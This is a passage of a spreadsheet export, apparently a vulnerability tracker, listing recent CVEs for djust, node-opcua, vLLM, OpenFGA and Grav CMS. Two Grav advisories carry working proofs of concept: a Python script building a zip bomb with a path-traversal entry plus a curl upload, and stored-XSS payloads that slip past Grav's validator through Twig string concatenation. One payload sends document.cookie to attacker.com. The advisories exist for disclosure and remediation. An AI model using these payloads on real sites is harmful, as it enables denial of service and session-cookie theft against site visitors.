      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, SSE sessions were keyed solely by a client-chosen `session_id` with no binding to the authenticated user — a control the WebSocket transport has but that was dropped on SSE. An attacker who learns (or a victim who leaks) a `session_id` could connect to the message endpoint and dispatch event handlers that execute with the victim's identity and state. This is fixed in djust 1.0.7. Each SSE session is bound to its owning principal at creation and cross-principal access is rejected; SSE session creation is additionally capped per principal. As a workaround, disable the SSE transport.</t>
        </is>
      </c>
      <c r="S14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61592</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61596</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M15" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr"/>
      <c r="Q15" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, djust's per-object authorization (`get_object` + `has_object_permission`, ADR-017) was enforced on the WebSocket mount and event paths but not on three other render entry points: (a) the initial HTTP GET render, (b) SPA `url_change` navigation, and (c) `{% live_render %}` embedded child views. An authenticated user could therefore view (and on some paths act on) an object they are not authorized for by loading the page directly, navigating to it via SPA url-change, or composing it as an embedded child — a classic IDOR / broken object-level access control on object-scoped views. This is fixed in djust 1.0.7. All render entry points now route through a shared `enforce_object_permission` chokepoint: HTTP GET returns 403, `url_change` emits a `permission_denied` frame and skips the render, and `{% live_render %}` (eager + lazy) refuses the embed. Views without a custom `get_object` are unaffected (no-op). No reliable workaround short of upgrading. Do not expose object-scoped views through the HTTP-GET / url_change / live_render paths until patched.</t>
        </is>
      </c>
      <c r="S15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61596</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61598</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M16" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr"/>
      <c r="Q16" s="5" t="inlineStr">
        <is>
          <t>CWE-915</t>
        </is>
      </c>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, `djust.mixins.model_binding.ModelBindingMixin` provides a default `update_model` event handler and is part of the LiveView base MRO, so every LiveView exposes it. It `setattr`s a view attribute whose name is client-supplied (`field`), gated only by: reject `_`-prefixed names; reject a 14-entry denylist of framework internals (`FORBIDDEN_MODEL_FIELDS`); optional `allowed_model_fields` which defaults to None = allow all; and `hasattr` existence. As a result, a client can set any public, existing view attribute — not just the fields actually bound with `dj-model=` in the rendered template. The denylist covers framework plumbing but nothing about developer business/authz state, and the allowlist is opt-in (off by default). A developer who binds one `dj-model="search"` input and also keeps `self.account_id` / `self.is_admin` / `self.total_price` as view state does not realize a client can set ALL of them via `{type:event, event:"update_model", params:{field, value}}` over the WebSocket. Type coercion matches the target attribute's type (so `"true"` -&gt; bool True), aiding the attacker. This issue is fixed in djust 1.0.7. As a workaround, set `allowed_model_fields` explicitly on every view using dj-model (or subclassing LiveView) to the minimal list of bindable fields; do not keep authorization/ownership state in public view attributes that share the view with dj-model bindings.</t>
        </is>
      </c>
      <c r="S16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61598</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68904</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr">
        <is>
          <t>npm:node-opcua, npm:node-opcua-client, npm:node-opcua-transport</t>
        </is>
      </c>
      <c r="M17" s="5" t="inlineStr">
        <is>
          <t>2.170.0</t>
        </is>
      </c>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr"/>
      <c r="Q17" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>node-opcua</t>
        </is>
      </c>
      <c r="S17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68904</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59193</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr">
        <is>
          <t>composer:getgrav/grav</t>
        </is>
      </c>
      <c r="M18" s="5" t="inlineStr">
        <is>
          <t>2.0.0</t>
        </is>
      </c>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr"/>
      <c r="P18" s="5" t="inlineStr"/>
      <c r="Q18" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>### Summary
An authenticated admin.super user can crash Grav or fill the disk by uploading a specially crafted ZIP archive through the Direct Install tool. The method `Installer::unZip()` calls `ZipArchive::extractTo()` without any limit on uncompressed size, entry count, or directory depth, enabling Zip Bomb (CWE-409), stack overflow (CWE-674), and disk/inode exhaustion.
### Details
The vulnerability is in `system/src/Grav/Common/GPM/Installer.php:176-208` (`Installer::unZip()`). The `ZipArchive::extractTo()` call at line 184 is not preceded by any validation of the archive contents.
Missing validation:
- ❌ No total uncompressed size check (decompression bomb — CWE-409)
- ❌ No entry count check (inode exhaustion)
- ❌ No directory nesting depth check (stack overflow in `Folder::doDelete()` — CWE-674)
The subsequent cleanup call `Folder::delete($destination)` at line 189 recursively deletes every subdirectory without depth limit (`Folder.php:531-547`). A ZIP with thousands of nested directories will cause PHP's maximum nesting level to be exceeded, so the cleanup fails silently and leaves extracted files on disk.
The existing Zip Slip fix (GHSA-w48r-jppp-rcfw / CVE-2026-42607, commit 5a12f9be8) only checks for `../` in entry paths and does not add any size, count, or depth limits.
### PoC
1. Generate the malicious ZIP:
   python3 cve_poc_grav_zip.py:
```python
#!/usr/bin/env python3
"""
CVE PoC — Grav CMS Installer::unZip()
Zip Bomb + Zip Slip + Deep Nesting
ZIP file to attach to the CVE advisory.
Note: Zip Slip (../) already has CVE-2026-42607. This PoC targets the Zip Bomb (CWE-409)
which has NO CVE — extracted size/depth/count have no limits.
"""
import zipfile, os, sys
OUT = "/tmp/cve_poc_grav.zip"
def build():
    with zipfile.ZipFile(OUT, 'w', zipfile.ZIP_DEFLATED) as z:
        # --- Zip Slip: arbitrary write outside target ---
        z.writestr("../../../tmp/CVE_POC_SLIP", "ZIP SLIP: writes outside target\n")
        # --- Deep nesting: 100 levels → Folder::delete() has no depth limit ---
        for i in range(100):
            z.writestr(f"deep/{'x/' * i}.keep", "")
        # --- Compression bomb: 100 identical files = ratio ~ 196:1 ---
        for i in range(100):
            z.writestr(f"bomb/{i}.dat", b"A" * 100_000)
    with zipfile.ZipFile(OUT) as z:
        infos = z.infolist()
        compressed = os.path.getsize(OUT)
        uncompressed = sum(e.file_size for e in infos)
        slip = any(".." in e.filename for e in infos)
        depths = [e.filename.count('/') for e in infos]
    print("=" * 60)
    print("CVE PoC — Grav CMS Installer::unZip()")
    print("Zip Bomb | Zip Slip | Deep Nesting")
    print("=" * 60)
    print(f"File           : {OUT}")
    print(f"ZIP size       : {compressed:,} B ({compressed/1024:.1f} KB)")
    print(f"Uncompressed   : {uncompressed:,} B ({uncompressed/1024/1024:.1f} MB)")
    print(f"Ratio          : {uncompressed/compressed:.0f}:1")
    print(f"Entries        : {len(infos)}")
    print(f"Max depth      : {max(depths) if depths else 0}")
    print(f"Zip Slip (../) : {'YES' if slip else 'NO'}")
    print(f"\nUpload via Grav Admin → /admin/tools/direct-install?task=directInstall")
    print(f"Result: disk exhaustion + Folder::delete() stack overflow + arbitrary write")
if __name__ == "__main__":
    build()
```
3. Authenticate as admin.super and retrieve the nonce from /admin
4. Upload through Direct Install:
```
   curl -X POST 'https://target/admin/tools/direct-install?task=directInstall' \
     -H 'Cookie: grav-admin=&lt;SESSION&gt;' \
     -F 'admin-nonce=&lt;NONCE&gt;' \
     -F 'uploaded_file=@/tmp/cve_poc_grav.zip'
```
Result: server extracts all entries (9.5 MB → 200 files + 100 nesting levels). The cleanup crashes with "Maximum function nesting level reached" due to 100-level deep recursion.
### Impact
An authenticated administrator (admin.super) can:
- Fill the server disk with highly compressed data (196:1 ratio with simple repeating data, up to 10^11:1 with nested ZIP bombs)
- Exhaust inodes via thousands of small files
- Trigger a PHP stack overflow via deep directory nesting that prevents cleanup, leaving files on disk permanently
- Partially or fully deny service to all users (both authenticated and unauthenticated)</t>
        </is>
      </c>
      <c r="S18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59193</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57173</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr">
        <is>
          <t>pip:vllm</t>
        </is>
      </c>
      <c r="M19" s="5" t="inlineStr">
        <is>
          <t>0.24.0</t>
        </is>
      </c>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr"/>
      <c r="Q19" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>vLLM is an inference and serving engine for large language models. Prior to 0.24.0, the input_audio handling path for /v1/chat/completions calls AudioMediaIO.load_bytes or AudioMediaIO.load_file without passing VLLM_MAX_AUDIO_DECODE_DURATION_S to the shared audio decoder. An unauthenticated client can therefore submit a small compressed audio input that expands into a very large float32 PCM allocation, bypassing the duration guard already used by /v1/audio/transcriptions and causing an out-of-memory worker crash. Inline data URLs reach this path without being bounded by VLLM_AUDIO_FETCH_TIMEOUT. The issue affects deployments serving an audio-capable model, and authentication changes only the deployment-specific reachability. This issue is fixed in version 0.24.0.</t>
        </is>
      </c>
      <c r="S19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57173</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61588</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M20" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr"/>
      <c r="Q20" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-359</t>
        </is>
      </c>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, when a Django `Model` instance is assigned to a public view attribute, djust serialized it to the client with no sensitive-field denylist — sending fields such as `password` (the hash), privilege flags (e.g. `is_staff` / `is_superuser`), tokens, and other PII to the browser. Because exposing model objects to templates is a normal djust pattern, this could leak credentials/PII without the developer realizing the full object crossed the wire. This is fixed in djust 1.0.7. Model serialization applies a secure-by-default sensitive-field denylist (password/hash/token/secret-style fields and known privilege flags are withheld) with an identity-subset fallback. As a workaround, keep `Model` instances on `_private` attributes and expose only the specific fields needed, until patched.</t>
        </is>
      </c>
      <c r="S20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61588</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61589</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M21" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr"/>
      <c r="Q21" s="5" t="inlineStr">
        <is>
          <t>CWE-348, CWE-639</t>
        </is>
      </c>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, the WebSocket `handle_mount` and `ViewRuntime._build_request` rebuild an `HttpRequest` via `RequestFactory().get(...)` with no `HTTP_HOST`, so `request.get_host()` defaulted to `"testserver"` on the live path. Host/subdomain/domain `TenantResolver`s then misresolved the tenant — `None` on the live path while the HTTP path resolved correctly. With `STRICT_MODE=False` the tenant-scoped managers returned unscoped rows (cross-tenant disclosure); with the default they returned an empty queryset (broken tenancy). This is fixed in djust 1.0.7. The handshake Host is extracted from the ASGI scope, validated against `ALLOWED_HOSTS` (the same logic as the CSWSH Origin gate, parsed with Django's `split_domain_port` so malformed Hosts are rejected at the boundary), and propagated — with the TLS scheme — into the reconstructed request, so live-path tenant resolution matches HTTP exactly. There is no known workaround on the live path short of upgrading. Users are most exposed when combined with `STRICT_MODE=False`.</t>
        </is>
      </c>
      <c r="S21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61589</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61709</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr">
        <is>
          <t>go:github.com/openfga/openfga</t>
        </is>
      </c>
      <c r="M22" s="5" t="inlineStr">
        <is>
          <t>1.18.1</t>
        </is>
      </c>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr"/>
      <c r="Q22" s="5" t="inlineStr">
        <is>
          <t>CWE-281, CWE-863</t>
        </is>
      </c>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>OpenFGA is an authorization and permission engine built for developers. Prior to 1.18.1, the ListUsers API could return a user that should have been excluded when an authorization relation used an intersection containing a base but not excluded operand, the base was granted through a type-bound public wildcard, and the excluded user also had a concrete tuple through another intersection operand. In pkg/server/commands/listusers/list_users_rpc.go, expandIntersection counted the concrete tuple and wildcard without first rejecting entries in excludedUsersMap. Applications that used ListUsers to enumerate or enforce access could therefore treat an excluded user as authorized. This issue is fixed in version 1.18.1.</t>
        </is>
      </c>
      <c r="S22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61709</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61453</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr">
        <is>
          <t>composer:getgrav/grav</t>
        </is>
      </c>
      <c r="M23" s="5" t="inlineStr">
        <is>
          <t>2.0.1</t>
        </is>
      </c>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr"/>
      <c r="P23" s="5" t="inlineStr"/>
      <c r="Q23" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-184, CWE-1336</t>
        </is>
      </c>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>## Summary
The XSS blueprint validator (`Security::detectXss()`) runs on the **raw page content before Twig processing**. An attacker can use Twig's string concatenation operator (`~`) to dynamically construct an event handler name at render time. The validator sees `{{ "on" ~ "error" }}` - a harmless Twig expression - and allows the content. After Twig processes the template, the output contains `&lt;img src=1 onerror=alert(1)&gt;` which is rendered via `{{ content|raw }}` and executes in the victim's browser.
---
## Details
**The two-stage attack** exploits the separation between validation and rendering:
**Stage 1 - what the XSS validator sees** (raw page content):
```twig
{% set x = "on" ~ "error" %}
&lt;img src=1 {{ x }}=alert(document.domain)&gt;
```
The `detectXss()` function scans this string. The `on_events` regex looks for `&lt;[^&gt;]*?[\s\x00-\x20\"\'\/](on\s*[a-z]+|xmlns)\s*=` inside HTML tags. In `{{ x }}`, the `{` character is not in the boundary set `[\s\x00-\x20\"\'\/]`, and `x` is not `on`. **No match - passes validation.**
**Stage 2 - what Twig produces** (after rendering):
```html
&lt;img src=1 onerror=alert(document.domain)&gt;
```
The validator never re-inspects Twig output. The theme template renders this via `{{ page.content|raw }}` (confirmed in `quark2/templates/default.html.twig:5`), so no auto-escaping occurs.
**Why `{% set %}` and `~` are allowed** - `system/config/security.yaml:125-145`:
```yaml
allowed_tags:
  - set          # ← allows variable assignment
  ...
```
The `~` operator is a core Twig operator for string concatenation (like `.` in PHP). It is not a function, filter, or tag — it is always available and not gated by the sandbox.
**The same technique bypasses the `dangerous_tags` blocklist** - any blocked tag name can be reconstructed:
```twig
&lt;s{{"c"~"r"~"i"~"p"~"t"}}&gt;alert(1)&lt;/s{{"c"~"r"~"i"~"p"~"t"}}&gt;
{# XSS validator sees: &lt;s{{...}}&gt; - no &lt;script&gt; tag detected
   Twig output: &lt;script&gt;alert(1)&lt;/script&gt; #}
```
**Also bypasses the `invalid_protocols` check**:
```twig
&lt;a href="{{"java"~"script"}}:alert(1)"&gt;click&lt;/a&gt;
{# Validator sees: href="{{...}}" - no "javascript:" protocol detected #}
```
---
## Proof of Concept
### Prerequisites
1. `twig_content.process_enabled: true` set by admin
2. `api.pages.write` permission (page creation)
### Step 1 - Obtain JWT token (any user with page write access)
```bash
JWT=$(curl -s http://127.0.0.1/grav/api/v1/auth/token \
  -X POST -H "Content-Type: application/json" \
  -d '{"username":"user","password":"pass"}' \
  | python3 -c "import json,sys; print(json.load(sys.stdin)['data']['access_token'])")
```
### Step 2 - Create page with Twig XSS payload
```bash
curl -s http://127.0.0.1/grav/api/v1/pages -X POST \
  -H "Authorization: Bearer $JWT" -H "Content-Type: application/json" \
  -d '{
    "title": "xss-page",
    "folder": "xss-page",
    "route": "/xss-page",
    "template": "default",
    "header": {"title": "xss", "process": {"markdown": false}},
    "content": "{% set x = \"on\" ~ \"error\" %}&lt;img src=1 {{ x }}=alert(document.domain)&gt;"
  }'
```
**Result**: `201 Created` - XSS validator passes because it sees `{{ x }}`, not `onerror`.
### Step 3 - Visit page → XSS fires
```bash
curl -s http://127.0.0.1/grav/xss-page | grep -oP '&lt;img[^&gt;]*&gt;'
# Output: &lt;img src=1 onerror=alert(document.domain)&gt;
```
Open in browser: `http://127.0.0.1/grav/xss-page` - `alert(document.domain)` fires.
&lt;img width="1842" height="996" alt="image" src="https://github.com/user-attachments/assets/eedd2555-266e-41fc-a461-c56631b8a588" /&gt;
&lt;img width="1346" height="263" alt="image" src="https://github.com/user-attachments/assets/b42b4ba3-4b8c-40a3-8fc3-62f961835aef" /&gt;
#### From a low-level user
Also From a low-level user normal script such as `&lt;img src=1 onerror=alert(1)&gt;` this is being blocked by the restriction.
&lt;img width="1849" height="980" alt="image" src="https://github.com/user-attachments/assets/f1503d4a-7daf-4237-b155-22801b961b57" /&gt;
But with payloads such as &lt;a href="{{"java"~"script"}}:alert(1)"&gt;click&lt;/a&gt; proves that the we can bypass the blueprint restrictions and upload malicious script to it
&lt;img width="1841" height="1009" alt="image" src="https://github.com/user-attachments/assets/60af8cf8-840a-4b9c-84ba-6f89355035fd" /&gt;
&lt;img width="1524" height="390" alt="image" src="https://github.com/user-attachments/assets/201991b7-3d56-4d85-9bbc-17a63b9cb770" /&gt;
### Alternative payloads (all bypass the validator)
| Payload | Twig Source | After Twig | Triggers |
|---------|------------|------------|----------|
| Event handler | `&lt;img src=1 {{"on"~"error"}}=alert(1)&gt;` | `&lt;img src=1 onerror=alert(1)&gt;` | Image load fails |
| Script tag | `&lt;s{{"c"~"r"~"i"~"p"~"t"}}&gt;alert(1)&lt;/s{{"c"~"r"~"i"~"p"~"t"}}&gt;` | `&lt;script&gt;alert(1)&lt;/script&gt;` | Immediately |
| Protocol bypass | `&lt;a href="{{"java"~"script"}}:alert(1)"&gt;click&lt;/a&gt;` | `&lt;a href="javascript:alert(1)"&gt;click&lt;/a&gt;` | On click |
| Iframe onload | `&lt;i{{"f"~"r"~"a"~"m"~"e"}} {{"on"~"load"}}=alert(1)&gt;` | `&lt;iframe onload=alert(1)&gt;` | Page load |
| Details toggle | `&lt;details open {{"on"~"toggle"}}=alert(1)&gt;` | `&lt;details open ontoggle=alert(1)&gt;` | Page load |
| Cookie theft | `&lt;img src=1 {{"on"~"error"}}=fetch("https://attacker.com/?c="+document.cookie)&gt;` | `&lt;img src=1 onerror=fetch(...)&gt;` | Image load fails |
### Admin preview caveat
The Admin2 SPA renders page previews inside a **sandboxed iframe**:
```html
&lt;iframe sandbox="allow-same-origin allow-scripts allow-forms"&gt;&lt;/iframe&gt;
```
`allow-modals` is **not** set - `alert()` is silenced in the admin preview. Use `fetch()`, `document.write()`, or DOM manipulation payloads to prove execution in the admin panel. The frontend page (no iframe) has no such restriction - `alert()` fires directly.
---
## Impact
Once the Twig content master gate is enabled by an administrator, **any user with page write access** can inject stored XSS into page content that executes for all visitors. The attack:
- **Bypasses all four XSS validator regexes** (`on_events`, `invalid_protocols`, `dangerous_tags`, `html_inline_styles`)
- **Bypasses the dangerous tag blocklist** (reconstructs `&lt;script&gt;`, `&lt;iframe&gt;`, `&lt;svg&gt;`, etc.)
- **Bypasses the invalid protocol blocklist** (reconstructs `javascript:`, `data:`)
- **Persists** across page edits (stored in page content file)
- **Executes** for every visitor to the page
An attacker can steal session cookies, perform actions as the victim, or deface the site.
---
## Remediation
### Option A - Re-run the XSS validator on Twig output
After `Twig::processPage()` renders the content, run the XSS validator on the **output** before it is cached and served:
```php
// In Twig::processPage(), after rendering
$rendered = $twig-&gt;render($name, $context);
$result = Security::detectXss($rendered);
if ($result !== null) {
    // Log and sanitize or block
    Security::logTwigSandboxViolation('xss_output', $result, '', $route);
    return ''; // or return escaped version
}
```
